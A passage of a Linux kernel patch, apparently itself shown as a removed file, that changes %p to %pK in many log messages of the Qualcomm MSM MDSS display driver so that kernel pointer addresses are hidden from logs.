-@@ -1080,7 +1080,7 @@ struct mdss_mdp_data *mdss_mdp_overlay_buf_alloc(struct msm_fb_data_type *mfd,
- list_move_tail(&buf->buf_list, &mdp5_data->bufs_used);
- list_add_tail(&buf->pipe_list, &pipe->buf_queue);
-
-- pr_debug("buffer alloc: %p\n", buf);
-+ pr_debug("buffer alloc: %pK\n", buf);
-
- return buf;
- }
-@@ -1134,7 +1134,7 @@ void mdss_mdp_overlay_buf_free(struct msm_fb_data_type *mfd,
- buf->last_freed = local_clock();
- buf->state =
MDP_BUF_STATE_UNUSED;
-
-- pr_debug("buffer freed: %p\n", buf);
-+ pr_debug("buffer freed: %pK\n", buf);
-
- list_move_tail(&buf->buf_list, &mdp5_data->bufs_pool);
- }
-@@ -1474,7 +1474,7 @@ static int __overlay_queue_pipes(struct msm_fb_data_type *mfd)
- if (buf) {
- switch (buf->state) {
- case MDP_BUF_STATE_READY:
-- pr_debug("pnum=%d buf=%p first buffer ready\n",
-+ pr_debug("pnum=%d buf=%pK first buffer ready\n",
- pipe->num, buf);
- break;
- case MDP_BUF_STATE_ACTIVE:
-@@ -1494,7 +1494,7 @@ static int __overlay_queue_pipes(struct msm_fb_data_type *mfd)
- }
- break;
- default:
-- pr_err("invalid state of buf %p=%d\n",
-+ pr_err("invalid state of buf %pK=%d\n",
- buf, buf->state);
- BUG();
- break;
-@@ -2160,7 +2160,7 @@ static int __mdss_mdp_overlay_release_all(struct msm_fb_data_type *mfd,
- u32 unset_ndx = 0;
- int cnt = 0;
-
-- pr_debug("releasing all resources for fb%d file:%p\n",
-+ pr_debug("releasing all resources for fb%d file:%pK\n",
- mfd->index, file);
-
- mutex_lock(&mdp5_data->ov_lock);
-diff --git a/drivers/video/msm/mdss/mdss_mdp_pipe.c b/drivers/video/msm/mdss/mdss_mdp_pipe.c
-index b14dd17..f7fbb7f 100644
---- a/drivers/video/msm/mdss/mdss_mdp_pipe.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_pipe.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -2278,7 +2278,7 @@ int mdss_mdp_pipe_queue_data(struct mdss_mdp_pipe *pipe,
- }
-
- if (src_data == NULL) {
-- pr_debug("src_data=%p pipe num=%dx\n",
-+ pr_debug("src_data=%pK pipe num=%dx\n",
- src_data, pipe->num);
- goto update_nobuf;
- }
-diff --git a/drivers/video/msm/mdss/mdss_mdp_pp.c b/drivers/video/msm/mdss/mdss_mdp_pp.c
-index 580d10b..6d59502 100644
---- a/drivers/video/msm/mdss/mdss_mdp_pp.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_pp.c
-@@ -1096,7 +1096,7 @@ static int pp_rgb_pipe_setup(struct mdss_mdp_pipe *pipe, u32 *op)
- int ret = 0;
-
- if (!pipe) {
-- pr_err("invalid param pipe %p\n", pipe);
-+ pr_err("invalid param pipe %pK\n", pipe);
- return -EINVAL;
- }
- if (pipe->flags & MDP_OVERLAY_PP_CFG_EN &&
-@@ -1114,7 +1114,7 @@ static int pp_dma_pipe_setup(struct mdss_mdp_pipe *pipe, u32 *op)
- int ret = 0;
-
- if (!pipe) {
-- pr_err("invalid param pipe %p\n", pipe);
-+ pr_err("invalid param pipe %pK\n", pipe);
- return -EINVAL;
- }
- if (pipe->flags & MDP_OVERLAY_PP_CFG_EN &&
-@@ -1435,7 +1435,7 @@ void mdss_mdp_pipe_pp_clear(struct mdss_mdp_pipe *pipe)
- struct pp_hist_col_info *hist_info;
-
- if (!pipe) {
-- pr_err("Invalid pipe context passed, %p\n",
-+ pr_err("Invalid pipe context passed, %pK\n",
- pipe);
- return;
- }
-@@ -1582,7 +1582,7 @@ static int pp_mixer_setup(struct mdss_mdp_mixer *mixer)
- struct mdss_data_type *mdata = mdss_mdp_get_mdata();
-
- if (!mixer || !mixer->ctl || !mixer->ctl->mfd || !mdata) {
-- pr_err("invalid parameters, mixer %p ctl %p mfd %p mdata %p\n",
-+ pr_err("invalid parameters, mixer %pK ctl %pK mfd %pK mdata %pK\n",
- mixer, (mixer ? mixer->ctl : NULL),
- (mixer ? (mixer->ctl ?
mixer->ctl->mfd : NULL) : NULL),
- mdata);
-@@ -2200,7 +2200,7 @@ int mdss_mdp_pp_resume(struct msm_fb_data_type *mfd)
- struct mdp_pa_v2_cfg_data *pa_v2_cache_cfg = NULL;
-
- if (!mfd) {
-- pr_err("invalid input: mfd = 0x%p\n", mfd);
-+ pr_err("invalid input: mfd = 0x%pK\n", mfd);
- return -EINVAL;
- }
-
-@@ -2290,7 +2290,7 @@ int mdss_mdp_pp_resume(struct msm_fb_data_type *mfd)
- mfd->index);
- return 0;
- } else if (ret || !ad) {
-- pr_err("Failed to get ad info: ret = %d, ad = 0x%p.\n",
-+ pr_err("Failed to get ad info: ret = %d, ad = 0x%pK.\n",
- ret, ad);
- return ret;
- }
-@@ -2431,7 +2431,7 @@ static int mdss_mdp_pp_dt_parse(struct device *dev)
- ret = 0;
- }
- } else {
-- pr_err("invalid dev %p mdata %p\n", dev, mdata);
-+ pr_err("invalid dev %pK mdata %pK\n", dev, mdata);
- ret = -EINVAL;
- }
- bail_out:
-@@ -2570,7 +2570,7 @@ int mdss_mdp_pp_overlay_init(struct msm_fb_data_type *mfd)
- struct mdss_data_type *mdata = mdss_mdp_get_mdata();
-
- if (!mfd || !mdata) {
-- pr_err("Invalid mfd %p mdata %p\n", mfd, mdata);
-+ pr_err("Invalid mfd %pK mdata %pK\n", mfd, mdata);
- return -EPERM;
- }
-
-@@ -2586,7 +2586,7 @@ int mdss_mdp_pp_default_overlay_config(struct msm_fb_data_type *mfd,
- int ret = 0;
-
- if (!mfd || !pdata) {
-- pr_err("Invalid parameters mfd %p pdata %p\n", mfd, pdata);
-+ pr_err("Invalid parameters mfd %pK pdata %pK\n", mfd, pdata);
- return -EINVAL;
- }
-
-@@ -2639,7 +2639,7 @@ static int pp_ad_calc_bl(struct msm_fb_data_type *mfd, int bl_in, int *bl_out,
- mfd->index);
- return 0;
- } else if (ret || !ad) {
-- pr_err("Failed to get ad info: ret = %d, ad = 0x%p.\n",
-+ pr_err("Failed to get ad info: ret = %d, ad = 0x%pK\n",
- ret, ad);
- return ret;
- }
-@@ -2655,7 +2655,7 @@ static int pp_ad_calc_bl(struct msm_fb_data_type *mfd, int bl_in, int *bl_out,
-
- if (!ad->bl_mfd || !ad->bl_mfd->panel_info ||
- !ad->bl_att_lut) {
-- pr_err("Invalid ad info: bl_mfd = 0x%p, ad->bl_mfd->panel_info = 0x%p, bl_att_lut = 0x%p\n",
-+ pr_err("Invalid ad
info: bl_mfd = 0x%pK, ad->bl_mfd->panel_info = 0x%pK, bl_att_lut = 0x%pK\n",
- ad->bl_mfd,
- (!ad->bl_mfd) ? NULL : ad->bl_mfd->panel_info,
- ad->bl_att_lut);
-@@ -3147,7 +3147,7 @@ int mdss_mdp_pcc_config(struct msm_fb_data_type *mfd,
- if (pp_ops[PCC].pp_get_config) {
- addr = mdss_mdp_get_dspp_addr_off(disp_num);
- if (IS_ERR_OR_NULL(addr)) {
-- pr_err("invalid dspp base_addr %p\n",
-+ pr_err("invalid dspp base_addr %pK\n",
- addr);
- ret = -EINVAL;
- goto pcc_clk_off;
-@@ -3835,7 +3835,7 @@ int mdss_mdp_hist_lut_config(struct msm_fb_data_type *mfd,
- mdss_mdp_clk_ctrl(MDP_BLOCK_POWER_ON);
- base_addr = mdss_mdp_get_dspp_addr_off(dspp_num);
- if (IS_ERR_OR_NULL(base_addr)) {
-- pr_err("invalid base addr %p\n",
-+ pr_err("invalid base addr %pK\n",
- base_addr);
- ret = -EINVAL;
- goto hist_lut_clk_off;
-@@ -4063,7 +4063,7 @@ int mdss_mdp_gamut_config(struct msm_fb_data_type *mfd,
- if (pp_ops[GAMUT].pp_get_config) {
- addr = mdss_mdp_get_dspp_addr_off(disp_num);
- if (IS_ERR_OR_NULL(addr)) {
-- pr_err("invalid dspp base addr %p\n",
-+ pr_err("invalid dspp base addr %pK\n",
- addr);
- ret = -EINVAL;
- goto gamut_clk_off;
-@@ -4249,7 +4249,7 @@ static int pp_hist_enable(struct pp_hist_col_info *hist_info,
- spin_lock_irqsave(&hist_info->hist_lock, flag);
- if (hist_info->col_en) {
- spin_unlock_irqrestore(&hist_info->hist_lock, flag);
-- pr_err("%s Hist collection has already been enabled %p\n",
-+ pr_err("%s Hist collection has already been enabled %pK\n",
- __func__, hist_info->base);
- ret = -EBUSY;
- goto exit;
-@@ -4405,7 +4405,7 @@ static int pp_hist_disable(struct pp_hist_col_info *hist_info)
- spin_lock_irqsave(&hist_info->hist_lock, flag);
- if (hist_info->col_en == false) {
- spin_unlock_irqrestore(&hist_info->hist_lock, flag);
-- pr_debug("Histogram already disabled (%p)\n", hist_info->base);
-+ pr_debug("Histogram already disabled (%pK)\n", hist_info->base);
- ret = -EINVAL;
- goto exit;
- }
-@@ -4508,7 +4508,7 @@ int mdss_mdp_hist_intr_req(struct
mdss_intr *intr, u32 bits, bool en)
- unsigned long flag;
- int ret = 0;
- if (!intr) {
-- pr_err("NULL addr passed, %p\n", intr);
-+ pr_err("NULL addr passed, %pK\n", intr);
- return -EINVAL;
- }
-
-@@ -5086,7 +5086,7 @@ static int mdss_mdp_get_ad(struct msm_fb_data_type *mfd,
-
- *ret_ad = NULL;
- if (!mfd) {
-- pr_err("invalid parameter mfd %p\n", mfd);
-+ pr_err("invalid parameter mfd %pK\n", mfd);
- return -EINVAL;
- }
- mdata = mfd_to_mdata(mfd);
-@@ -5133,7 +5133,7 @@ static int pp_ad_invalidate_input(struct msm_fb_data_type *mfd)
- mfd->index);
- return 0;
- } else if (ret || !ad) {
-- pr_err("Failed to get ad info: ret = %d, ad = 0x%p.\n",
-+ pr_err("Failed to get ad info: ret = %d, ad = 0x%pK\n",
- ret, ad);
- return ret;
- }
-@@ -5168,7 +5168,7 @@ int mdss_mdp_ad_config(struct msm_fb_data_type *mfd,
- mfd->index);
- return ret;
- } else if (ret || !ad) {
-- pr_err("Failed to get ad info: ret = %d, ad = 0x%p.\n",
-+ pr_err("Failed to get ad info: ret = %d, ad = 0x%pK\n",
- ret, ad);
- return ret;
- }
-@@ -5285,7 +5285,7 @@ int mdss_mdp_ad_input(struct msm_fb_data_type *mfd,
- mfd->index);
- return ret;
- } else if (ret || !ad) {
-- pr_err("Failed to get ad info: ret = %d, ad = 0x%p.\n",
-+ pr_err("Failed to get ad info: ret = %d, ad = 0x%pK\n",
- ret, ad);
- return ret;
- }
-@@ -5638,7 +5638,7 @@ static int mdss_mdp_ad_ipc_reset(struct msm_fb_data_type *mfd)
- struct mdss_ad_info *ad;
-
- if (!mfd) {
-- pr_err("mfd = 0x%p\n", mfd);
-+ pr_err("mfd = 0x%pK\n", mfd);
- return -EINVAL;
- }
-
-@@ -5648,7 +5648,7 @@ static int mdss_mdp_ad_ipc_reset(struct msm_fb_data_type *mfd)
- mfd->index);
- return 0;
- } else if (ret || !ad) {
-- pr_err("Failed to get ad info: ret = %d, ad = 0x%p.\n",
-+ pr_err("Failed to get ad info: ret = %d, ad = 0x%pK\n",
- ret, ad);
- return ret;
- }
-@@ -5672,13 +5672,13 @@ static int mdss_mdp_ad_setup(struct msm_fb_data_type *mfd)
- u32 width;
-
- if (!mfd) {
-- pr_err("mfd = 0x%p\n", mfd);
-+ pr_err("mfd = 0x%pK\n", mfd);
- return
-EINVAL;
- }
-
- ctl = mfd_to_ctl(mfd);
- if (!ctl) {
-- pr_err("ctl = 0x%p\n", ctl);
-+ pr_err("ctl = 0x%pK\n", ctl);
- return -EINVAL;
- }
- sctl = mdss_mdp_get_split_ctl(ctl);
-@@ -5689,7 +5689,7 @@ static int mdss_mdp_ad_setup(struct msm_fb_data_type *mfd)
- mfd->index);
- return 0;
- } else if (ret || !ad) {
-- pr_err("Failed to get ad info: ret = %d, ad = 0x%p.\n",
-+ pr_err("Failed to get ad info: ret = %d, ad = 0x%pK\n",
- ret, ad);
- return ret;
- }
-@@ -5873,7 +5873,7 @@ static void pp_ad_calc_worker(struct work_struct *work)
- }
- mdp5_data = mfd_to_mdp5_data(ad->mfd);
- if (!mdp5_data) {
-- pr_err("mdp5_data = 0x%p\n", mdp5_data);
-+ pr_err("mdp5_data = 0x%pK\n", mdp5_data);
- mutex_unlock(&ad->lock);
- return;
- }
-@@ -5881,7 +5881,7 @@ static void pp_ad_calc_worker(struct work_struct *work)
- ctl = mfd_to_ctl(ad->mfd);
- mdata = mfd_to_mdata(ad->mfd);
- if (!ctl || !mdata || ad->calc_hw_num >= mdata->nad_cfgs) {
-- pr_err("ctl = 0x%p, mdata = 0x%p, ad->calc_hw_num = %d, mdata->nad_cfg = %d\n",
-+ pr_err("ctl = 0x%pK, mdata = 0x%pK, ad->calc_hw_num = %d, mdata->nad_cfg = %d\n",
- ctl, mdata, ad->calc_hw_num,
- (!mdata ?
0 : mdata->nad_cfgs));
- mutex_unlock(&ad->lock);
-@@ -6492,7 +6492,7 @@ static int sspp_cache_location(u32 pipe_type, enum pp_config_block *block)
- int ret = 0;
-
- if (!block) {
-- pr_err("invalid params %p\n", block);
-+ pr_err("invalid params %pK\n", block);
- return -EINVAL;
- }
- switch (pipe_type) {
-@@ -6521,7 +6521,7 @@ int mdss_mdp_pp_sspp_config(struct mdss_mdp_pipe *pipe)
- int ret = 0;
-
- if (!pipe) {
-- pr_err("invalid params, pipe %p\n", pipe);
-+ pr_err("invalid params, pipe %pK\n", pipe);
- return -EINVAL;
- }
-
-@@ -6643,7 +6643,7 @@ static int pp_update_pcc_pipe_setup(struct mdss_mdp_pipe *pipe, u32 location)
- char __iomem *pipe_base = NULL;
-
- if (!pipe) {
-- pr_err("invalid param pipe %p\n", pipe);
-+ pr_err("invalid param pipe %pK\n", pipe);
- return -EINVAL;
- }
-
-@@ -6695,7 +6695,7 @@ int mdss_mdp_pp_get_version(struct mdp_pp_feature_version *version)
- u32 ver_info = mdp_pp_legacy;
-
- if (!version) {
-- pr_err("invalid param version %p\n", version);
-+ pr_err("invalid param version %pK\n", version);
- ret = -EINVAL;
- goto exit_version;
- }
-@@ -6776,7 +6776,7 @@ int mdss_mdp_copy_layer_pp_info(struct mdp_input_layer *layer)
- uint32_t ops;
-
- if (!layer) {
-- pr_err("invalid layer pointer passed %p\n", layer);
-+ pr_err("invalid layer pointer passed %pK\n", layer);
- return -EFAULT;
- }
-
-@@ -6788,7 +6788,7 @@ int mdss_mdp_copy_layer_pp_info(struct mdp_input_layer *layer)
- ret = copy_from_user(pp_info, layer->pp_info,
- sizeof(struct mdp_overlay_pp_params));
- if (ret) {
-- pr_err("layer list copy from user failed, pp_info = %p\n",
-+ pr_err("layer list copy from user failed, pp_info = %pK\n",
- layer->pp_info);
- ret = -EFAULT;
- goto exit_pp_info;
-@@ -6921,7 +6921,7 @@ static int pp_mfd_ad_release_all(struct msm_fb_data_type *mfd)
- int ret = 0;
-
- if (!mdata || !mfd) {
-- pr_err("invalid params mdata %p mfd %p\n", mdata, mfd);
-+ pr_err("invalid params mdata %pK mfd %pK\n", mdata, mfd);
- return -EINVAL;
- }
- if
(!mdata->ad_calc_wq)
-diff --git a/drivers/video/msm/mdss/mdss_mdp_pp_cache_config.c b/drivers/video/msm/mdss/mdss_mdp_pp_cache_config.c
-index 7769a8f..5fe7e48 100644
---- a/drivers/video/msm/mdss/mdss_mdp_pp_cache_config.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_pp_cache_config.c
-@@ -103,7 +103,7 @@ static int pp_hist_lut_cache_params_v1_7(struct mdp_hist_lut_data *config,
- int ret = 0;
-
- if (!config || !mdss_pp_res) {
-- pr_err("invalid param config %p pp_res %p\n",
-+ pr_err("invalid param config %pK pp_res %pK\n",
- config, mdss_pp_res);
- return -EINVAL;
- }
-@@ -113,7 +113,7 @@ static int pp_hist_lut_cache_params_v1_7(struct mdp_hist_lut_data *config,
- return -EINVAL;
- }
- if (!mdss_pp_res->pp_data_res) {
-- pr_err("invalid pp_data_res %p\n", mdss_pp_res->pp_data_res);
-+ pr_err("invalid pp_data_res %pK\n", mdss_pp_res->pp_data_res);
- return -EINVAL;
- }
-
-@@ -165,7 +165,7 @@ static int pp_hist_lut_cache_params_pipe_v1_7(struct mdp_hist_lut_data *config,
- int ret = 0;
-
- if (!config || !pipe) {
-- pr_err("Invalid param config %p pipe %p\n",
-+ pr_err("Invalid param config %pK pipe %pK\n",
- config, pipe);
- return -EINVAL;
- }
-@@ -236,7 +236,7 @@ int pp_hist_lut_cache_params(struct mdp_hist_lut_data *config,
- int ret = 0;
-
- if (!config || !res_cache) {
-- pr_err("invalid param config %p res_cache %p\n",
-+ pr_err("invalid param config %pK res_cache %pK\n",
- config, res_cache);
- return -EINVAL;
- }
-@@ -245,7 +245,7 @@ int pp_hist_lut_cache_params(struct mdp_hist_lut_data *config,
- return -EINVAL;
- }
- if (!res_cache->mdss_pp_res && !res_cache->pipe_res) {
-- pr_err("NULL payload for block %d mdss_pp_res %p pipe_res %p\n",
-+ pr_err("NULL payload for block %d mdss_pp_res %pK pipe_res %pK\n",
- res_cache->block, res_cache->mdss_pp_res,
- res_cache->pipe_res);
- return -EINVAL;
-@@ -286,7 +286,7 @@ int pp_dither_cache_params_v1_7(struct mdp_dither_cfg_data *config,
- struct mdp_dither_data_v1_7 *v17_cache_data = NULL, v17_usr_config;
-
- if
(!config || !mdss_pp_res) {
-- pr_err("invalid param config %p pp_res %p\n",
-+ pr_err("invalid param config %pK pp_res %pK\n",
- config, mdss_pp_res);
- return -EINVAL;
- }
-@@ -296,7 +296,7 @@ int pp_dither_cache_params_v1_7(struct mdp_dither_cfg_data *config,
- return -EINVAL;
- }
- if (!mdss_pp_res->pp_data_res) {
-- pr_err("invalid pp_data_res %p\n", mdss_pp_res->pp_data_res);
-+ pr_err("invalid pp_data_res %pK\n", mdss_pp_res->pp_data_res);
- return -EINVAL;
- }
-
-@@ -358,7 +358,7 @@ int pp_dither_cache_params(struct mdp_dither_cfg_data *config,
- {
- int ret = 0;
- if (!config || !mdss_pp_res) {
-- pr_err("invalid param config %pi pp_res %p\n",
-+ pr_err("invalid param config %pK pp_res %pK\n",
- config, mdss_pp_res);
- return -EINVAL;
- }
-@@ -387,7 +387,7 @@ static int pp_gamut_cache_params_v1_7(struct mdp_gamut_cfg_data *config,
- int ret = 0, i = 0;
-
- if (!config || !mdss_pp_res) {
-- pr_err("invalid param config %p pp_res %p\n",
-+ pr_err("invalid param config %pK pp_res %pK\n",
- config, mdss_pp_res);
- return -EINVAL;
- }
-@@ -398,7 +398,7 @@ static int pp_gamut_cache_params_v1_7(struct mdp_gamut_cfg_data *config,
- return -EINVAL;
- }
- if (!mdss_pp_res->pp_data_res) {
-- pr_err("invalid pp_data_res %p\n", mdss_pp_res->pp_data_res);
-+ pr_err("invalid pp_data_res %pK\n", mdss_pp_res->pp_data_res);
- return -EINVAL;
- }
- res_cache = mdss_pp_res->pp_data_res;
-@@ -555,7 +555,7 @@ int pp_gamut_cache_params(struct mdp_gamut_cfg_data *config,
- {
- int ret = 0;
- if (!config || !mdss_pp_res) {
-- pr_err("invalid param config %p pp_res %p\n",
-+ pr_err("invalid param config %pK pp_res %pK\n",
- config, mdss_pp_res);
- return -EINVAL;
- }
-@@ -578,7 +578,7 @@ static int pp_pcc_cache_params_pipe_v1_7(struct mdp_pcc_cfg_data *config,
- struct mdp_pcc_data_v1_7 *v17_cache_data = NULL, v17_usr_config;
-
- if (!pipe || !config) {
-- pr_err("invalid params pipe %p config %p\n", pipe, config);
-+ pr_err("invalid params pipe %pK config %pK\n", pipe, config);
-
return -EINVAL;
- }
-
-@@ -636,7 +636,7 @@ static int pp_pcc_cache_params_v1_7(struct mdp_pcc_cfg_data *config,
- struct mdp_pcc_data_v1_7 *v17_cache_data, v17_usr_config;
-
- if (!config || !mdss_pp_res) {
-- pr_err("invalid param config %p pp_res %p\n",
-+ pr_err("invalid param config %pK pp_res %pK\n",
- config, mdss_pp_res);
- return -EINVAL;
- }
-@@ -647,7 +647,7 @@ static int pp_pcc_cache_params_v1_7(struct mdp_pcc_cfg_data *config,
- return -EINVAL;
- }
- if (!mdss_pp_res->pp_data_res) {
-- pr_err("invalid pp_data_res %p\n", mdss_pp_res->pp_data_res);
-+ pr_err("invalid pp_data_res %pK\n", mdss_pp_res->pp_data_res);
- return -EINVAL;
- }
-
-@@ -687,7 +687,7 @@ int pp_pcc_cache_params(struct mdp_pcc_cfg_data *config,
- {
- int ret = 0;
- if (!config || !res_cache) {
-- pr_err("invalid param config %p pp_res %p\n",
-+ pr_err("invalid param config %pK pp_res %pK\n",
- config, res_cache);
- return -EINVAL;
- }
-@@ -696,7 +696,7 @@ int pp_pcc_cache_params(struct mdp_pcc_cfg_data *config,
- return -EINVAL;
- }
- if (!res_cache->mdss_pp_res && !res_cache->pipe_res) {
-- pr_err("NULL payload for block %d mdss_pp_res %p pipe_res %p\n",
-+ pr_err("NULL payload for block %d mdss_pp_res %pK pipe_res %pK\n",
- res_cache->block, res_cache->mdss_pp_res,
- res_cache->pipe_res);
- return -EINVAL;
-@@ -735,7 +735,7 @@ static int pp_igc_lut_cache_params_v1_7(struct mdp_igc_lut_data *config,
- struct mdp_igc_lut_data_v1_7 *v17_cache_data, v17_usr_config;
- u32 disp_num;
- if (!config || !mdss_pp_res) {
-- pr_err("invalid param config %p pp_res %p\n",
-+ pr_err("invalid param config %pK pp_res %pK\n",
- config, mdss_pp_res);
- return -EINVAL;
- }
-@@ -745,7 +745,7 @@ static int pp_igc_lut_cache_params_v1_7(struct mdp_igc_lut_data *config,
- return -EINVAL;
- }
- if (!mdss_pp_res->pp_data_res) {
-- pr_err("invalid pp_data_res %p\n", mdss_pp_res->pp_data_res);
-+ pr_err("invalid pp_data_res %pK\n", mdss_pp_res->pp_data_res);
- return -EINVAL;
- }
- res_cache =
mdss_pp_res->pp_data_res;
-@@ -781,7 +781,7 @@ static int pp_igc_lut_cache_params_v1_7(struct mdp_igc_lut_data *config,
- }
- if (copy_from_kernel && (!v17_usr_config.c0_c1_data ||
- !v17_usr_config.c2_data)) {
-- pr_err("copy from kernel invalid params c0_c1_data %p c2_data %p\n",
-+ pr_err("copy from kernel invalid params c0_c1_data %pK c2_data %pK\n",
- v17_usr_config.c0_c1_data,
- v17_usr_config.c2_data);
- ret = -EINVAL;
-@@ -837,7 +837,7 @@ static int pp_igc_lut_cache_params_pipe_v1_7(struct mdp_igc_lut_data *config,
- struct mdp_igc_lut_data_v1_7 *v17_cache_data = NULL, v17_usr_config;
- int ret = 0, fix_up = 0, i = 0;
- if (!config || !pipe) {
-- pr_err("invalid param config %p pipe %p\n",
-+ pr_err("invalid param config %pK pipe %pK\n",
- config, pipe);
- return -EINVAL;
- }
-@@ -865,7 +865,7 @@ static int pp_igc_lut_cache_params_pipe_v1_7(struct mdp_igc_lut_data *config,
- if (!v17_usr_config.c0_c1_data ||
- !v17_usr_config.c2_data ||
- v17_usr_config.len != IGC_LUT_ENTRIES) {
-- pr_err("invalid c0_c1data %p c2_data %p tbl len %d\n",
-+ pr_err("invalid c0_c1data %pK c2_data %pK tbl len %d\n",
- v17_usr_config.c0_c1_data,
- v17_usr_config.c2_data,
- v17_usr_config.len);
-@@ -959,7 +959,7 @@ int pp_igc_lut_cache_params(struct mdp_igc_lut_data *config,
- {
- int ret = 0;
- if (!config || !res_cache) {
-- pr_err("invalid param config %p pp_res %p\n",
-+ pr_err("invalid param config %pK pp_res %pK\n",
- config, res_cache);
- return -EINVAL;
- }
-@@ -968,7 +968,7 @@ int pp_igc_lut_cache_params(struct mdp_igc_lut_data *config,
- return -EINVAL;
- }
- if (!res_cache->mdss_pp_res && !res_cache->pipe_res) {
-- pr_err("NULL payload for block %d mdss_pp_res %p pipe_res %p\n",
-+ pr_err("NULL payload for block %d mdss_pp_res %pK pipe_res %pK\n",
- res_cache->block, res_cache->mdss_pp_res,
- res_cache->pipe_res);
- ret = -EINVAL;
-@@ -1103,7 +1103,7 @@ int pp_pgc_lut_cache_params(struct mdp_pgc_lut_data *config,
- {
- int ret = 0;
- if (!config || !mdss_pp_res) {
--
pr_err("invalid param config %p pp_res %p\n",
-+ pr_err("invalid param config %pK pp_res %pK\n",
- config, mdss_pp_res);
- return -EINVAL;
- }
-@@ -1128,7 +1128,7 @@ static int pp_pa_cache_params_v1_7(struct mdp_pa_v2_cfg_data *config,
- int disp_num, ret = 0;
-
- if (!config || !mdss_pp_res) {
-- pr_err("Invalid param config %p pp_res %p\n",
-+ pr_err("Invalid param config %pK pp_res %pK\n",
- config, mdss_pp_res);
- return -EINVAL;
- }
-@@ -1140,7 +1140,7 @@ static int pp_pa_cache_params_v1_7(struct mdp_pa_v2_cfg_data *config,
- }
-
- if (!mdss_pp_res->pp_data_res) {
-- pr_err("Invalid pp_data_res %p\n", mdss_pp_res->pp_data_res);
-+ pr_err("Invalid pp_data_res %pK\n", mdss_pp_res->pp_data_res);
- return -EINVAL;
- }
-
-@@ -1228,7 +1228,7 @@ static int pp_pa_cache_params_pipe_v1_7(struct mdp_pa_v2_cfg_data *config,
- int ret = 0;
-
- if (!config || !pipe) {
-- pr_err("Invalid param config %p pipe %p\n",
-+ pr_err("Invalid param config %pK pipe %pK\n",
- config, pipe);
- return -EINVAL;
- }
-@@ -1284,7 +1284,7 @@ int pp_pa_cache_params(struct mdp_pa_v2_cfg_data *config,
- {
- int ret = 0;
- if (!config || !res_cache) {
-- pr_err("invalid param config %p pp_res %p\n",
-+ pr_err("invalid param config %pK pp_res %pK\n",
- config, res_cache);
- return -EINVAL;
- }
-@@ -1293,7 +1293,7 @@ int pp_pa_cache_params(struct mdp_pa_v2_cfg_data *config,
- return -EINVAL;
- }
- if (!res_cache->mdss_pp_res && !res_cache->pipe_res) {
-- pr_err("NULL payload for block %d mdss_pp_res %p pipe_res %p\n",
-+ pr_err("NULL payload for block %d mdss_pp_res %pK pipe_res %pK\n",
- res_cache->block, res_cache->mdss_pp_res,
- res_cache->pipe_res);
- return -EINVAL;
-@@ -1344,7 +1344,7 @@ int pp_copy_layer_igc_payload(struct mdp_overlay_pp_params *pp_info)
- pp_info->igc_cfg.cfg_payload,
- sizeof(struct mdp_igc_lut_data_v1_7));
- if (ret) {
-- pr_err("layer list copy from user failed, IGC cfg payload = %p\n",
-+ pr_err("layer list copy from user failed, IGC cfg payload = %pK\n",
-
pp_info->igc_cfg.cfg_payload);
- ret = -EFAULT;
- kfree(cfg_payload);
-@@ -1382,7 +1382,7 @@ int pp_copy_layer_hist_lut_payload(struct mdp_overlay_pp_params *pp_info)
- pp_info->hist_lut_cfg.cfg_payload,
- sizeof(struct mdp_hist_lut_data_v1_7));
- if (ret) {
-- pr_err("layer list copy from user failed, Hist LUT cfg payload = %p\n",
-+ pr_err("layer list copy from user failed, Hist LUT cfg payload = %pK\n",
- pp_info->hist_lut_cfg.cfg_payload);
- ret = -EFAULT;
- kfree(cfg_payload);
-@@ -1420,7 +1420,7 @@ int pp_copy_layer_pa_payload(struct mdp_overlay_pp_params *pp_info)
- pp_info->pa_v2_cfg_data.cfg_payload,
- sizeof(struct mdp_pa_data_v1_7));
- if (ret) {
-- pr_err("layer list copy from user failed, PA cfg payload = %p\n",
-+ pr_err("layer list copy from user failed, PA cfg payload = %pK\n",
- pp_info->pa_v2_cfg_data.cfg_payload);
- ret = -EFAULT;
- kfree(cfg_payload);
-@@ -1458,7 +1458,7 @@ int pp_copy_layer_pcc_payload(struct mdp_overlay_pp_params *pp_info)
- pp_info->pcc_cfg_data.cfg_payload,
- sizeof(struct mdp_pcc_data_v1_7));
- if (ret) {
-- pr_err("layer list copy from user failed, PCC cfg payload = %p\n",
-+ pr_err("layer list copy from user failed, PCC cfg payload = %pK\n",
- pp_info->pcc_cfg_data.cfg_payload);
- ret = -EFAULT;
- kfree(cfg_payload);
-diff --git a/drivers/video/msm/mdss/mdss_mdp_pp_v1_7.c b/drivers/video/msm/mdss/mdss_mdp_pp_v1_7.c
-index fe88fe6..bc19b5b 100644
---- a/drivers/video/msm/mdss/mdss_mdp_pp_v1_7.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_pp_v1_7.c
-@@ -245,7 +245,7 @@ static void pp_gamut_clock_gating_en(char __iomem *base_addr);
- void *pp_get_driver_ops(struct mdp_pp_driver_ops *ops)
- {
- if (!ops) {
-- pr_err("PP driver ops invalid %p\n", ops);
-+ pr_err("PP driver ops invalid %pK\n", ops);
- return ERR_PTR(-EINVAL);
- }
-
-@@ -307,7 +307,7 @@ static void pp_opmode_config(int location, struct pp_sts_type *pp_sts,
- u32 *opmode, int side)
- {
- if (!pp_sts || !opmode) {
-- pr_err("Invalid pp_sts %p or opmode %p\n", pp_sts,
opmode);
-+ pr_err("Invalid pp_sts %pK or opmode %pK\n", pp_sts, opmode);
- return;
- }
- switch (location) {
-@@ -361,7 +361,7 @@ static int pp_hist_lut_get_config(char __iomem *base_addr, void *cfg_data,
- struct mdp_hist_lut_data *lut_cfg_data = NULL;
-
- if (!base_addr || !cfg_data) {
-- pr_err("invalid params base_addr %p cfg_data %p\n",
-+ pr_err("invalid params base_addr %pK cfg_data %pK\n",
- base_addr, cfg_data);
- return -EINVAL;
- }
-@@ -373,7 +373,7 @@ static int pp_hist_lut_get_config(char __iomem *base_addr, void *cfg_data,
- }
- if (lut_cfg_data->version != mdp_hist_lut_v1_7 ||
- !lut_cfg_data->cfg_payload) {
-- pr_err("invalid hist_lut version %d payload %p\n",
-+ pr_err("invalid hist_lut version %d payload %pK\n",
